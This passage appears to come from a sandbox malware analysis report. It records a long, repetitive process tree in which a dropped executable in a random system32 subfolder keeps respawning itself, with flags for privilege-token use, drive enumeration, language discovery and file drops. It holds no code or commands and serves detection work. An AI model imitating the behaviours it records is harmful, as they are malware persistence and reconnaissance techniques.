        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        59⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1112
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        60⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1076
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        61⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2428
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        62⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1208
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        63⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2828
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        64⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1392
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        65⤵
        Executes dropped EXE
        Enumerates connected drives
        
        PID:2400
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        66⤵
        
        PID:236
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        67⤵
        
        PID:764
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        68⤵
        
        PID:1480
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        69⤵
        
        PID:1004
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        70⤵
        System Location Discovery: System Language Discovery
        
        PID:2376
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        71⤵
        Enumerates connected drives
        
        PID:2208
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        72⤵
        
        PID:2244
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        73⤵
        
        PID:2468
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        74⤵
        
        PID:1132
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        75⤵
        
        PID:1660
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        76⤵
        
        PID:2260
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        77⤵
        
        PID:1164
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        78⤵
        
        PID:2432
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        79⤵
        
        PID:1048
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        80⤵
        
        PID:1032
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        81⤵
        
        PID:1760
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        82⤵
        
        PID:1152
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        83⤵
        
        PID:2968
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        84⤵
        
        PID:2408
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        85⤵
        
        PID:1920
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        86⤵
        System Location Discovery: System Language Discovery
        
        PID:2768
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        87⤵
        
        PID:2008
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        88⤵
        System Location Discovery: System Language Discovery
        
        PID:1680
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        89⤵
        
        PID:2788
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        90⤵
        
        PID:1624
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        91⤵
        System Location Discovery: System Language Discovery
        
        PID:2700
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        92⤵
        Enumerates connected drives
        
        PID:1604
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        93⤵
        
        PID:2088
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        94⤵
        Drops file in System32 directory
        
        PID:1976
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        95⤵
        
        PID:1972
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        96⤵
        Drops file in System32 directory
        
        PID:2452
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        97⤵
        
        PID:2396
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        98⤵
        
        PID:1448
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        99⤵
        
        PID:1636
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        100⤵
        System Location Discovery: System Language Discovery
        
        PID:2932
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        101⤵
        
        PID:1068
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        102⤵
        Enumerates connected drives
        
        PID:2252
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        103⤵
        
        PID:628
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        104⤵
        
        PID:2288
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        105⤵
        
        PID:2496
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        106⤵
        
        PID:2532
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        107⤵
        
        PID:536
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        108⤵
        Enumerates connected drives
        
        PID:1044
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        109⤵
        
        PID:3088
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        110⤵
        Drops file in System32 directory
        
        PID:3136
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        111⤵
        
        PID:3156
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        112⤵
        
        PID:3184
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        113⤵
        
        PID:3252
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        114⤵
        Drops file in System32 directory
        
        PID:3264
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        115⤵
        
        PID:3320
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        116⤵
        
        PID:3376
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        117⤵
        
        PID:3392
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        118⤵
        Enumerates connected drives
        
        PID:3456
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        119⤵
        Enumerates connected drives
        Drops file in System32 directory
        
        PID:3492
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        120⤵
        
        PID:3616
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        121⤵
        
        PID:3680
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        122⤵
        
        PID:3732
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        123⤵
        
        PID:3816
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        124⤵
        
        PID:3924
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        125⤵
        
        PID:3944
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        126⤵
        
        PID:4004
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        127⤵
        
        PID:4064
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        128⤵
        
        PID:3076
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        129⤵
        Enumerates connected drives
        
        PID:3124
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        130⤵
        
        PID:3224
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        131⤵
        Enumerates connected drives
        
        PID:3276
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        132⤵
        
        PID:3296
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        133⤵
        
        PID:3444
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        134⤵
        
        PID:3532
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        135⤵
        
        PID:3556
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        136⤵
        Drops file in System32 directory
        
        PID:3596
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        137⤵
        Enumerates connected drives
        Drops file in System32 directory
        
        PID:3788
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        138⤵
        
        PID:3744
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        139⤵
        
        PID:3772
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        140⤵
        
        PID:3808
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        141⤵
        
        PID:3888
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        142⤵
        
        PID:3912
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        143⤵
        Drops file in System32 directory
        
        PID:3824
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        144⤵
        
        PID:3988
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        145⤵
        Drops file in System32 directory
        
        PID:3892
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        146⤵
        Drops file in System32 directory
        
        PID:4092
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        147⤵
        Enumerates connected drives
        
        PID:4056
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        148⤵
        Enumerates connected drives
        
        PID:3104
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        149⤵
        Enumerates connected drives
        System Location Discovery: System Language Discovery
        
        PID:1460
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        150⤵
        
        PID:3308
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        151⤵
        Drops file in System32 directory
        
        PID:3384
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        152⤵
        Drops file in System32 directory
        
        PID:3488
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        153⤵
        
        PID:3316
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        154⤵
        
        PID:3508
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        155⤵
        
        PID:3612
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        156⤵
        
        PID:3668
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        157⤵
        Drops file in System32 directory
        
        PID:3828
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        158⤵
        
        PID:3836
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        159⤵
        
        PID:3848
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        160⤵
        
        PID:3860
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        161⤵
        
        PID:3968
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        162⤵
        
        PID:3976
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        163⤵
        
        PID:2600
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        164⤵
        
        PID:4044
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        165⤵
        
        PID:4084
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        166⤵
        Drops file in System32 directory
        
        PID:3148
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        167⤵
        
        PID:3192
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        168⤵
        
        PID:3208
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        169⤵
        
        PID:3240
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        170⤵
        System Location Discovery: System Language Discovery
        
        PID:3300
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        171⤵
        
        PID:3292
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        172⤵
        Enumerates connected drives
        System Location Discovery: System Language Discovery
        
        PID:3352
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        173⤵
        Drops file in System32 directory
        
        PID:3360
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        174⤵
        
        PID:3524
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        175⤵
        
        PID:3540
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        176⤵
        Drops file in System32 directory
        
        PID:3468
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        177⤵
        
        PID:3572
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        178⤵
        
        PID:3600
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        179⤵
        
        PID:3640
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        180⤵
        Enumerates connected drives
        
        PID:3656
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        181⤵
        
        PID:3624
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        182⤵
        
        PID:3700
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        183⤵
        
        PID:3716
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        184⤵
        
        PID:3764
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        185⤵
        Drops file in System32 directory
        
        PID:3872
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        186⤵
        
        PID:3936
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        187⤵
        
        PID:3956
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        188⤵
        System Location Discovery: System Language Discovery
        
        PID:4012
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        189⤵
        
        PID:4024
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        190⤵
        Drops file in System32 directory
        
        PID:2092
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        191⤵
        
        PID:1572
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        192⤵
        
        PID:3452
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        193⤵
        
        PID:3408
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        194⤵
        
        PID:3440
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        195⤵
        
        PID:3196
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        196⤵
        
        PID:3756
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        197⤵
        
        PID:3432
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        198⤵
        Enumerates connected drives
        
        PID:4108
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        199⤵
        
        PID:4120
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        200⤵
        
        PID:4132
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        201⤵
        
        PID:4144
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        202⤵
        
        PID:4156
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        203⤵
        
        PID:4168
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        204⤵
        System Location Discovery: System Language Discovery
        
        PID:4184
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        205⤵
        System Location Discovery: System Language Discovery
        
        PID:4200
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        206⤵
        
        PID:4220
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        207⤵
        
        PID:4232
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        208⤵
        
        PID:4244
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        209⤵
        
        PID:4256
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        210⤵
        Drops file in System32 directory
        
        PID:4268
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        211⤵
        
        PID:4280
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        212⤵
        
        PID:4292
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        213⤵
        Enumerates connected drives
        System Location Discovery: System Language Discovery
        
        PID:4304
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        214⤵
        
        PID:4316
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        215⤵
        
        PID:4328
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        216⤵
        
        PID:4344
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        217⤵
        System Location Discovery: System Language Discovery
        
        PID:4360
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        218⤵
        
        PID:4372
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        219⤵
        
        PID:4384
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        220⤵
        
        PID:4396
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        221⤵
        
        PID:4408
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        222⤵
        
        PID:4420
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        223⤵
        
        PID:4432
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        224⤵
        
        PID:4444
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        225⤵
        
        PID:4456
        
